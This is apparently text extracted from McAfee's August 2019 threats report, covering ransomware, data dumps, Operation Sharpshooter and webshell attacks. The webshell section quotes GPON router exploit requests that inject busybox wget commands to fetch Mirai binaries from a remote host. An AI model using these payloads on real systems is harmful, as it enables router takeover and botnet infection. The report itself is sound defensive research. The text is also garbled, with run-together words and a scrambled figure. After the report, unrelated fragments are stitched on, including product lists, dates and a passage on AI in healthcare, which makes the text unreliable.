McAfee Labs Threats Report August 2019
McAfee LabsThreats ReportAugust 2019KEY CAMPAIGNSNew Ransomware TechniquesDiscoveredHigh-Profile Data Dumps ExposeBillions of AccountsAttackers Target More LucrativeReturns from Larger Enterprises
REPORTRansomware attacks grew by 118%, newransomware families were detected, andthreat actors used innovative techniques.This report was researchedand written by: Christiaan Beek Taylor Dunton John Fokker Steve Grobman Tim HuxIntroductionWelcome to the McAfee Labs Threats Report, August 2019. In this edition, we highlight thesignificant investigative research and trends in threats statistics and observations inthe evolving threat landscape gathered by the McAfee Advanced Threat Research andMcAfee Labs teams in Q1 of 2019. Tim Polzer Marc Rivero Lopez Thomas Roccia Jessica Saavedra-Morales Raj Samani Ryan SherstobitoffIn the first quarter of 2019, ransomware attacks grew by 118%, new ransomware familieswere detected, and threat actors used innovative techniques. In January, the McAfeeAdvanced Threat Research team was the first to discover a new ransomware family,Anatova, designed to cipher all files before requesting payment from the victim. Anatova’sarchitecture is unusual in that it is modular, which could facilitate future development ofransomware.FollowShare2McAfee Labs Threats Report, August 2019
REPORTKEY TOPICA hacker using the moniker “Gnosticplayers“ reportedlyreleased data from large companies in Q1, which McAfeeresearchers have dubbed “the quarter of data dumps.”We also observed a significant amount of HTTP webexploitation traffic and attempts to compromise remotemachines. A notable 460% rise in the use of PowerShellas the tool of choice in targeted attacks of compromisedservers was also detected. Most ransomware attackersno longer use mass campaigns, but, instead, try to getremote access where remote desktop protocol is themost used entry vector.new vulnerabilities within connected devices that allowhackers access to the personal lives of consumers viavulnerabilities in smart locks and Wemo-equipped coffeemakers.Even with all the sophisticated attack techniques beingdeveloped, attackers are still highly dependent onhuman interaction and social engineering.—Raj Samani, Chief Scientist and McAfee fellowAlso, in Q1, new cryptojacking families—includingmalware targeting Apple users—were discovered amidstcampaigns designed to steal wallets and credentials,along with a massive cryptomining campaign designedto exploit remote command executive vulnerabilityin ThinkPHP. Criminals continue to attack Internet ofThings (IoT) devices with default username/passwordcombinations that are used in popular IP cameras, DVRs,and routers. McAfee researchers also uncovered twoMcAfee also revealed evidence that the OperationSharpshooter campaign was more complex andextensive in scope and duration of operations.We hope you find the Q1 2019 Threats Reportenlightening and valuable to your continued campaign tothwart enemy attacks and secure your data and assets.Twitter @Raj Samani—Christiaan Beek, Lead ScientistTwitter @ChristiaanBeekFollowShare3McAfee Labs Threats Report, August 2019
Table of Contents5New RansomwareTechniques Discovered7High-Profile DataDumps Expose Billionsof Accounts10 Attackers Target MoreLucrative Returns fromLarger Enterprises12 Supply Chain Attacks18 Significant HTTP WebExploitation TargetingCompanies, Rise ofWebshells4McAfee Labs Threats Report, August 201922 New CryptojackingFamilies, CampaignsDetected23 Flaws, Defects inMicrosoft Windows,Microsoft Office,ThinkPHP, Apple iOS29 New Exploit KitDiscovered, Fallout,Fiesta Active30 Continued Attacks onPopular IoT PersonalElectronics, Appliances34 Threats Statistics
REPORTNew Ransomware Techniques DiscoveredThe 118% increase in ransomware attacks included thediscovery of new ransomware families utilizing new,innovative techniques to target and infect enterprises.McAfee researchers observed cybercriminals are stillusing spear-phishing tactics, but an increasing numberof attacks are gaining access to a company that hasopen and exposed remote access points, such as RDPand virtual network computing (VNC). RDP credentialscan be brute-forced, obtained from password leaks,or simply bought in underground markets. Where pastransomware criminals would set up a command andcontrol environment for the ransomware and decryptionkeys, most criminals now approach victims with ransomnotes that include an anonymous email service address,allowing bad actors to remain better hidden.KEY TOPICnew, embedded functionalities designed to thwart antiransomware methods. Data cannot be restored withoutpayment and a generic decryption tool cannot becreated with today’s technology. Our analysis indicatesthat Anatova has been written by skilled softwaredevelopers.Top three ransomware familiesDespite a decline in volume and unique ransomwarefamilies in Q4 of 2018, the first quarter of 2019 saw thedetection of several new ransomware families usinginnovative techniques to target businesses. The topthree ransomware families (based on volume) that weremost active in Q1 are: New ransomware families include AnatovaThe McAfee Advanced Threat Research team discoveredone of the new ransomware families, Anatova, before itcould become a bigger threat.¹ Anatova, based on thename of the ransom note, was detected in a privatepeer-to-peer (p2p) network. Anatova usually uses theicon of a game or application to trick the user intodownloading it. The ransomware can adapt quickly, usingevasion tactics and spreading mechanisms. Anatova hasa manifest to request administrative rights and strongprotection techniques against static analysis whichmakes things tricky. Its modular design allows it to add Dharma: This ransomware appends variousextensions to infected files and is a variant of CrySiS.The malware has been in operation since 2016, andthe threat actors behind the ransomware continue torelease new variants, which are not decryptable.GandCrab: This ransomware uses AES encryptionand drops a file labeled “GandCrab.exe” on theinfected system. The malicious software adds “.GDCB”to encrypted files and is known to be delivered tounsuspecting victims using the RIG exploit kit.FollowShare5McAfee Labs Threats Report, August 2019
2QDrj.WpemJaRyuk: Early in Q1, an outbreak of Ryuk ransomwareimpeded newspaper printing services in the UnitedStates. McAfee investigated the incident and studiedits inner workings, including technical indicators,cybercriminal traits, and evidence discovered on thedark web.² McAfee hypothesized that the Ryuk attacksmay not necessarily be backed by a nation-state,but rather share the characteristics of a cybercrimeoperation. McAfee published an article describing howthe hasty attribution of Ryuk ransomware to NorthKorea was missing the point. Since then, collectiveindustry peers discovered additional technical detailsof Ryuk.Marozka3DUNNANsepasouthTellyoodbinh oxR obbitf xaRabnlde C.aGoEJNukRy erpum KEY TOPICecryalo pt2pidck 4-gierlletteYatrGandC dayMaoloaDharmaPonyVegaCla lockerpRyukFcEn d MCr rikAh ytekkihiRansomwareXcryAustraDrCyspak tlian- osJSW AESormVacaT1happyEnc1JamesScarab-crashJan-19rt0yp nzCr-zzwoJu tXorarewWaMeogrGekoncrgLoGo takee estblfou -GedbulafariteScSpFigure 1. Active ransomware families of Q1 2019.FollowShare6McAfee Labs Threats Report, August 2019abCrdniGa DoggRontokJokaroo
REPORTIt should be noted that GandCrab and Ryuk are usingmostly spear-phishing as a distribution mechanism,whereas Dharma is used in RDP attacks.New variants of another persistent family, Scarab, alsohave been discovered on a continued basis in 2019. InQ1, various new samples were detected, appending arange of extensions to infected files such as .zzzzzzzz,.crash, .GEFEST, .AERTEMY, .kitty, .aescrypt, .crabs, .Joke,.nosafe, .tokog, and .suffer. Some variants accept Bitcoin,as well as, DASH for payment.No more ransom’s GandCrab decryptorThe GandCrab ransomware, which appeared earlyin 2018 and was addressed by McAfee gateway andendpoint products, resumed activity after release of aninitial decryptor. The No More Ransom collective againstransomware countered with a decryptor that unlocksfiles up to Gandcrab version 5.1, but GandCrab quicklyfollowed with a new version 5.2. Europol announced inQ1 that the new decryptor allowed more than 14,000people to save their encrypted files.³ McAfee is proud towork alongside law enforcement and security agenciesas part of the continuing No More Ransom initiative.KEY TOPICHigh-Profile Data Dumps Expose Billions ofAccountsCollection breaches dump more than two billionaccountsThe first quarter of 2019 can easily be dubbed “thequarter of data dumps.” Collection #1 first appearedon the popular MEGA cloud service.⁴ The Collection#1 folder held more than 12,000 files and more than87 gigabytes. Its data set appeared to be designed totarget credential-stuffing attacks to leverage email andpassword combinations to hack into consumers’ onlineaccounts. Collection #1’s data set exposed more than770,000 unique email addresses and more than 21million unique passwords. When the storage site wastaken down, the folder filled with passwords was thentransferred to a public hacking site that was not for salebut was made available for anyone to take. The largevolume of files made Collection #1 the second largestbreach to Yahoo and the largest public breach in history.The discovery of Collection #2–5 just weeks later pushedthe campaign’s total amount of stolen accounts to morethan 2.2 billion.FollowShare7McAfee Labs Threats Report, August 2019
REPORTKEY TOPICGnosticplayers releases nearly 1 billion accountsLaw enforcement shuts down RDP shop xDedicHacker Gnosticplayers gained media attention, offeringseveral rounds of releases and nearly one billion freshaccount records for sale on the dark web’s DreamMarket. The release included data from several largecompanies.In January, the FBI teamed with Belgian police andother law enforcement agencies to take down xDedic, alarge RDP shop online platform selling remote desktopprotocol access to hacked machines and logins, leavingmajor companies potentially vulnerable to data theftand ransomware. In 2016, it was reported that xDedicwas selling access to about 70,000 hacked machines. In2018, McAfee research into the RDP shop eco-climatedetermined that xDedic was still one of the top five mostprolific RDP shops and a popular source for criminalsintent on committing credit card fraud, cryptomining,ransomware, and account fraud. McAfee recentlyhighlighted steps an organization can take to bettersecure RDP.The massive number of stolen credentials provideideal ammunition for credential-stuffing attacks inwhich criminals attempt to take over user accountsby automatically injecting the stolen credentials into awebsite until they gain access to an existing account.[[ Round ]] Coubic.com [1.5 million][[ Round ]] 3.06 md5 lifebear.com [japan] entrie80.157ESCROW80.157OrderESCROW[[ Round ]] Youthmanual.com[[ Round ]] Bukalapak 13 million [alexa top 200]80.3407ESCROWOrderOrder80.144ESCROWFigure 2. Gnosticplayers Dream market advertisement.OrderFigure 3. Takedown notice on the Xdedic website.FollowShare8McAfee Labs Threats Report, August 2019
REPORTKEY TOPICDream Market shut downIn March, the largest underground dark market, DreamMarket, announced its shutdown and transfer to apartner market. Dream Market administrators pointed toa large amount of distributed denial-of-services (DDoS)attacks they had to endure, but other sources suggestedthe shutdown was tied to the 62 worldwide arrests ofdark market vendors announced by international lawenforcement agencies.⁵FollowShare9McAfee Labs Threats Report, August 2019
REPORTKEY TOPICAttackers Target More Lucrative Returns fromLarger EnterprisesCampaigns using data leakage, brute-forcepassword spraying, automationIn the first quarter of 2019, the industry saw a rise intargeted attacks against larger organizations. Theseattacks, including the initial scraping of data, orreconnaissance, have been done through leakage orbrute-force password spraying and a good amountof automation. Using these techniques, threat actorsare required to invest little effort in pursuit of largerreturns, depending on the organization and personallyidentifiable information (PII) exfiltrated.Percentageof TrackedCampaigns UsingThis TechniqueIDTacticTechniqueT1193Initial AccessSpear-phishingattachment68T1204ExecutionUser Execution77T1086ExecutionPowerShell45T1027Defense EvasionObfuscated Files orInformation50T1020ExfiltrationAutomated Exfiltration77T1041ExfiltrationExfiltration on C2channels72T1043Command andControlCommonly used ports72T1071Command andControlStandard applicationlayer protocols72FollowShare10McAfee Labs Threats Report, August 2019
REPORTKEY TOPICMore than 36 publicly known targeted attacks wereobserved, with threat actors focusing more on largerorganizations that have been surveyed to producea more lucrative return. The McAfee AdvancedThreat Research team gathered technical details andtechniques through research of more than 22 targetedattack campaigns. Analysis of these details shows threatactors are going after bigger fish, and they continue touse user execution and spear-phishing attachments inattacks.McAfee Advanced Threat Research has beenmonitoring the global DNS hijacking campaign targetingtelecommunications, internet infrastructure providers,and government entities in the Middle East, Europe, andNorth America.⁶ Though DNS poisoning usually occurslocally on the victim’s machine or router, this attackcompromised DNS setting at a much higher level—beyond the end user’s control. Below is a depiction of aDNS A Record altering:Username, password,and domain credentialsare harvested and storedAttackerProxyDNS ProviderChange A RecordRedirect to amalicious siteTargetVictim accessing their mailserver, unknowingly beingredirected to a malicioussystem before landing ontheir legitimate mail server.The victim is typicallyunaware and might onlynotice a slight delay.Load BalancerMalicious cert createdfor legitimate mail serverFollowMalicious system witha proxy pass through11McAfee Labs Threats Report, August 2019Victim Mail ServerShare
REPORTKEY TOPICLazarus GroupSupply Chain AttacksIn February, it was reported the Lazarus Grouplured Russian-based organizations with a StarForceTechnologies NDA agreement, tricking victims intoopening the document riddled with macros andcamouflaged its cabinet (CAB) files as JPEGs to lower thedetection rate. Within the same month, we also becameprivy to another cyberespionage campaign targetingnational security think tanks and academic institutions inthe U.S.⁷ The Lazarus Group allegedly has also launchedanother operation targeting the cryptocurrency spacewith FallChill. Connections between the Lazarus Group’smalware galaxy can be found here.Operation ShadowHammerThe frequency of supply chain attacks seems to beon the rise. The supply chain attacks use backdooredsoftware versions executed on the victim’s computer,with the update allowing attacker access. The firstquarter of 2019 saw the announcement that a majorPC manufacturer’s software-update mechanism wascompromised and contained malware. The supply chainattack, Operation ShadowHammer, took place in late2018, and targeted an unknown pool of users identifiedby their network adapters’ MAC addresses. Thebackdoored executable was signed with the vendor’scertificate. This might indicate that the adversaries hadcontrol over the update mechanism and could inserttheir “version” of the updated ftware supplierTrojanizedsoftwareFollowShare12McAfee Labs Threats Report, August 2019
REPORTThe malware contained the functionality to determine ifthe infected system was in the adversaries’ interest. Themalware used an algorithm to scan for the Media AccessControl (MAC) address of the victim’s network interfaceand hashed it to an MD5 value:The fact that the malware contains a check that looksfor a VMware virtual adapter first, followed by a MACaddress on the same machine with a different value, isan indicator that the adversaries knew precisely whatto go after. With information on their exact targets, theyhad carefully planned the operation to infiltrate theirvictims by using a software update mechanism of asupplier.KEY TOPICOperation SharpShooterIn Q4 of 2018, the McAfee Advanced Threat Researchteam discovered a new global campaign targetingnuclear, defense, energy, and financial companies.Tagged Operation SharpShooter, this ongoing campaignleverages an in-memory implant to download andretrieve a second-stage implant—which we call RisingSun—for further exploitation.In Q1 of 2019, McAfee conducted a detailed analysisof code and data from a command-and-control serverresponsible for the management of the operations,tools, and tradecraft behind this global cyberespionagecampaign. This content was provided to McAfee forFollowFigure 4. Routine that checks MAC address and created MDS.13McAfee Labs Threats Report, August 2019Share
REPORTanalysis by a government entity that is familiar withMcAfee published research on this malware campaign.The analysis led to identification of multiple, previouslyunknown command-and-control servers and suggeststhat Operation Sharpshooter began as early asSeptember 2017, targeting a broad set of organizationsin more industries and countries. The McAfee AdvancedThreat Research team’s analysis into the Rising Sunimplants shows code overlap from malware dating to2016 to Operation Sharpshooter. The command andcontrol server data reveals some fascinating findingsabout how the server was controlled and otherinteresting conclusions:KEY TOPIC The analysis of the command and control codeconfirms that in earlier attacks, the Rising Sun implantwas using some of the same code and data as used inOperation Sharpshooter.Operation Sharpshooter utilizes the same commandand control code running on the servers as Rising Sun.The Operation Sharpshooter sample code and datafrom January 2018 included seven different commandand control servers running the same commandinterpreter code found in Rising Sun.Key findings There are multiple versions of the Rising Sun implantthat have been used in attacks since at least 2016. Theattackers have used backdoor Duuzer source code asa basis for their implants since early 2016.The attackers have been using a command and controlinfrastructure with the core backend written in PHPand ASP. The code appears to be custom and uniqueto the group, and our analysis reveals that it has beenpart of its operations since 2017.FollowShare14McAfee Labs Threats Report, August 2019
REPORTKEY TOPICThe content, provided to us by a government entity, hasprovided insights into the Sharpshooter command andcontrol and reveals how the actor’s backend operationswork. The command and control server is used, forexample, to monitor the incoming traffic from victimsthat were infected with the Rising Sun implants. Theexposure of this command and control code enables usPrimary C223.227.207.185Running TinyProxy1.8.4Threat ActorConnectExpress VPNCommand RelayDirect Accessto ServerIntermediate C2Hacked ServerConnectNotice.phpWebshellto better understand how they manage their operations,tools, and tradecraft. This command and control datahas provided the McAfee Advanced Threat Researchteam with the ability to detect more samples thatotherwise would have remained unknown, unless wehad analyzed the contents of dozens of packet capturesthat exhibited identical behavior.Command RelayMainmenu.phpCommandInterpreterFramework .phpImplant DownloaderVendor .phpImplant DownloaderApple .phpEncrypted EXEServer Web DirectoryGet Commands/Seed DataRisingSunFigure 5. Component Interaction in attacker’s framework.15McAfee Labs Threats Report, August 2019DownloadRisingSun V2MaldotDownlaodRisingSun v2DownlaodDownloaderMypng.pngDownloaderDownlaodand DecryptFollowShare
REPORTThe investigation of the command and control codehelped us identify not only more servers, but alsoenabled us to locate variations of Rising Sun goingback to 2016. The McAfee Advanced Threat Researchteam analyzed the additional Rising Sun samples anddetermined that there are multiple versions, all of whichincluded the core Duuzer bot capabilities.⁸ We also seea clear evolutionary path from the Duuzer implant towhat we see now as Rising Sun, version 2, which is thelatest iteration of the implant framework. This implanttakes on various forms dating back to the time thatBackdoor Duuzer was originally revealed in OperationBlockbuster. The Blockbuster report was a coalition ofprivate industry partners joined together to identify,understand, and aid the industry in exposing theLazarus Group.The attackers operating this family of implants (RisingSun) have used some key operational and engineeringpractices to successfully infect their targets and thwartdetection mechanisms: The bot capabilities across all variants of Rising Sunare the same. There have been minimal changes inthese functionalities, with only a couple of new botcapabilities added to new variants (example: “CreateProcess as user” in Rising Sun v2.0). The attackershave aimed to preserve the core bot capabilitiesof the implant family (derived from Trojan Duuzer),while modifying peripheral functionalities to supportinfection, deployment, and communication.KEY TOPIC There are multiple mechanisms used to deliver anddeploy the implants to the target endpoints. Examplesof these are the malicious documents (maldocs),downloaders/droppers, and injectors that can finallydeploy the RS implants in the form of either standalone .exes, service DLLs, or DLLs that are directlyinjected into the memory of a benign process.The communications mechanisms have also seenvariations ranging from different HTTP communicationschemes to the use of SSL-based communication.It is therefore highly likely that the implant familyconsists of the following key components stitchedtogether to engineer the final implant payloads: Configuration Acquiring Modules—ranging fromindependent files to embedded resources Configuration Decryption Module—RC4 based Core BOT Capabilities Module—same as TrojanDuuzer CnC Communication Modules—multiple HTTPmodules and SSL modulesFollowShare16McAfee Labs Threats Report, August 2019
REPORTKEY TOPICThe Evolution of Rising Sun ImplantRisingSun ImplantBOT CapabilitiesAPI Resolution TechniquesVersionSimilaritiesAPI Resolution in CodeData Configuration Execute commandsGet drive informationLaunch process from Windows binaryGet processes informationTerminate processGet file timesRead a fileWrite a file to diskDelete fileGet additional file informationConnect to an IP addressChange file attributesVariant of change file attributesC2 configuration information: ContainsURLs and IP addresses of the CnC servers.Local configuratoin data: Contains Privilegenames, VM related strings, Registry keys, etc.DifferencesC2 Configuration Location DataCommunication MechanismsDeployment TechniquesV1.0Hardcoded configuration datablobs in the implants itself.V1.0HTTP POST requests with optionalHTTP data in a specific format.V1.0Distributed via malicious documentthat inject shellcode into Word process.V1.1Uses a file on disk in the currentlylogged in user’s profile folder toread the C2 configuration data from.V1.1Different set of HTTP headers totransmit the data to its CnC.V1.1Distribution techniquescurrently unknown.V1.2Embedded resources in the binarycontaining the RCA encrypted CnC data.V1.2Uses SSL to connect to its C2 IPaddresses with hardcoded certificates.V1.2Distributed via downloader binaries.FollowShare17McAfee Labs Threats Report, August 2019
REPORTKEY TOPICSignificant HTTP Web Exploitation TargetingCompanies, Rise of WebshellsDuring Q1, monitoring by the McAfee AdvancedThreat Research team detected network attack trendsand attempted exploitation of remote assets. Ourdata is used to determine prominent and uniqueattack vectors being utilized by various actors andcybercriminal groups. The data represents the currentthreat landscape as it relates to network-based threatstargeting companies and individuals around the globe.It also shows where these attacks are originating fromand what specific countries are at most risk from thesethreats before the community at large is aware.We tracked distinct global locations that host multipletypes of malicious activity, such as botnet command andcontrol infrastructure, malware hosting, and advancedpersistent threat (APT) infrastructure. The data includedlegitimate systems that have been compromised andrepurposed during attacks. Many of these hostinglocations were quickly brought up for the attack andthen taken down hours later.Figure 6. Global locations that host (likely compromised) maliciousactivity on all protocols.CLICK TO VIEW LARGER Our analysis includes the tracking of malicious locationsthat are identified as TOR relays or exit nodes that areused in network-based attacks.Figure 7. Global locations of trafficsources with malicious reputation.CLICK TO VIEW LARGER FollowShare18McAfee Labs Threats Report, August 2019
REPORTKEY TOPICFurther network-based exploitation is still widely usedby actors in addition to the classical spear-phishing andemail-based threats. Some of these examples includethe delivery of various malware over numerous networkprotocols using a variety of network exploits to act upontheir objectives.Top attacks over SMB protocol NETBIOS SMB-DS IPC Share AccessNETBIOS SMB-DS Session Setup NTMLSSP Unicodeasn1 overflowTop attacks over HTTP protocol 19Apache Tomcat JSP upload bypass (JSP webshellinstallation)Attackers coming from Chinese infrastructure areattempting to upload a JSP (Java Server Pages)-basedwebshell to remote targets. (See section Rise ofWebshells) Apache Struts RCE Jakarta Multipart parser Apache Struts OGNL Expression Injection Microsoft IIS Remote Code execution Microsoft IIS 6.0 BO RCE Suspicious CHMOD in URI\ Joomla RCE (JDatabaseDriverMysqli) Joomla RCE M2 (Serialized PHP in UA)McAfee Labs Threats Report, August 2019Figure 8. Global traffic locations of malicious activity coming fromTOR network.Figure 9. Global map attackers originating.CLICK TO VIEW LARGER CLICK TO VIEW LARGER FollowShare
REPORTKEY TOPICBrute-force logins over RDPDuring the course of Q1, we observed significant attacksinvolving brute forcing of credentials over the RDPprotocol for Microsoft Windows-based systems. Thisanalysis is just some of the top location we see bruteforce traffic originating from targeting the MicrosoftWindows platform.Web attacksIn Q1, the McAfee Advanced Threat Research teamobserved a significant 460% increase in new PowerShellattacks in the amount of HTTP web exploitation trafficattempting to compromise remote machines. Thistraffic is often attributed to attacks designed to convertlegitimate assets into command and control servers,malware distribution hosts, and establishment of botnetclients. This web exploitation traffic consists of malwaredelivery, webshell delivery, and other malicious activityseen over the HTTP protocol.Figure 10. Global HTTP exploit traffic for a 30-day period.CLICK TO VIEW LARGER Server Message Block (SMB)Server Message Block (SMB) threats, such as WannaCry,continue to impact systems around the globe. In a30-day period during Q1, the McAfee Advanced ThreatResearch team observed more than 4 million uniquesources of SMB exploit traffic destined for targetsaround the world. SMBs pose a risk for less configuredsystems running legacy applications that are unable tobe completely patched. Significant traffic originating onthe SMB protocol has been detected targeting variousmachines in an attempt to exploit them and gain access.Figure 11. Global SMB exploit trafficfor a 30-day period.CLICK TO VIEW LARGER FollowShare20McAfee Labs Threats Report, August 2019
REPORTKEY TOPICRise of webshellsWebshells were a growing tool of choice in targetedattacks during Q1, especially in maintaining access tocompromised servers. Webshells provide the attackerwith backdoor access to remote targets, often deliveredthrough a variety of exploits. We observed severalinteresting patterns of webshell installation on remotetargets originating from various global points.Webshell downloadersVarious types of webshells are being installed on remotetargets designed to download and install malware onremote targets. One webshell example is a Remote CodeExecution vulnerability, documented CVE-2019-10562and CVE-2018-10561. It enables code to be executedon the GPON home router platform. We also observedattacks that included WGET commands that contactedremote sites to download variants of the Mirai botnet.McAfee observed a new webshell example, FxCodeShell.JSP, appearing predominantly in Europe and Asia.Typically, we have seen webshells that are written inASP or PHP languages characteristically used by variousnation-state and non-nation-state actors. This Javabased webshell is designed to download remote filesand execute them on the remote target host, specificallyLinux-based operating systems. This indicates that thetarget systems run technologies on Linux, such as weband email services, and establish command and controlservers to maintain persistence. The FXCodeShell hasbeen seen originating from Chinese infrastructure andtargeting countries in Asia and Europe.XWebPageName diag&diag action ping&wan conlist 0&dest host ’/bin/busybox wget http:///lib/tmp.mips -O tXWebPageName diag&diag action ping&wan conlist 0&dest host ’/bin/busybox wget http:///shiinXWebPageName diag&diag action ping&wan conlist 0&dest host ;wget http:///bins/t
REPORT 2 McAfee Labs Threats Report, August 2019 Follow Share Ransomware attacks grew by 118%, new ransomware families were detected, and threat actors used innovative techniques. Introduction Welcome to the
McAfee Management of Native Encryption (MNE) 4.1.1 McAfee Policy Auditor 6.2.2 McAfee Risk Advisor 2.7.2 McAfee Rogue System Detection (RSD) 5.0.4 and 5.0.5 McAfee SiteAdvisor Enterprise 3.5.5 McAfee Virtual Technician 8.1.0 McAfee VirusScan Enterprise 8.8 Patch 8 and Patch 9 McA
4 From McAfee.com, copy the McAfee ePO software to the virtual McAfee ePO server. 5 From the McAfee ePO server, run the setup utility. 6 Using a remote browser, log on to McAfee
McAfee Firewall Enterprise Control Center Release Notes, version 5.3.1 McAfee Firewall Enterprise Control Center Product Guide, version 5.3.1 McAfee Firewall Enterprise McAfee Firewall Enterprise on CloudShield Installation Guide, version 8.3.0 McAfee Network Integrity Agent Product Guide, version 1.0.0.0
August 2, 2021 15 August 2, 2021 16 August 2, 2021 17 August 3, 2021 18 August 4, 2021 19 August 5, 2021 20 August 6, 2021 21 August 9, 2021 22 August 9, 2021 23 August 9, 2021 24 August 10, 2021 25 August 11, 2021 26 August 12, 2021 27 August 13, 2021 28 August 16, 2021 29 August 16, 2021 30 August 16, 2021 31
McAfee ePolicy Orchestrator web API Scripting Guide McAfee ePolicy Orchestrator Log File Reference Guide These guides are available from the McAfee Support Website. Preface About this guide 8 McAfee ePolicy
the McAfee Firewall Admin Console client software, the hardware or virtual platform for running the firewall software. Configuration B. comprises: the McAfee Firewall Enterprise software, including its SecureOS operating system, the McAfee Firewal
McAfee, Inc. McAfee Firewall Enterprise 4150E Hardware Part Number: NSA-4150-FWEX-E Firmware Versions: 7.0.1.03 and 8.2.0 FIPS 140-2 Non-Proprietary Security Policy FIPS Security Level: 2 Document Version: 0.6 Prepared for: Prepared by: McAfee, Inc. Corsec Security, Inc. 282
Artificial Intelligence and its application in healthcare could be another great leap, like population-wide vaccination or IVF, but as this report sets out, it must be handled with care. For me, the key theme that leaps from almost every page of this report is the tension between the tech mantra, ‘move fast and break things’ and principle enshrined in the Hippocratic Oath, ‘First, do no .
